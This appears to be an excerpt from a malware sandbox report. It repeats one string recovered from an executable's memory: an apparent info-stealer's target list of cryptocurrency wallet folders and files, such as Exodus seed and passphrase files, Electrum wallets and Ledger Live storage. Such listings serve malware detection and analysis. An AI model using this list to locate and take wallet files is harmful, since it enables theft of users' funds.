Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
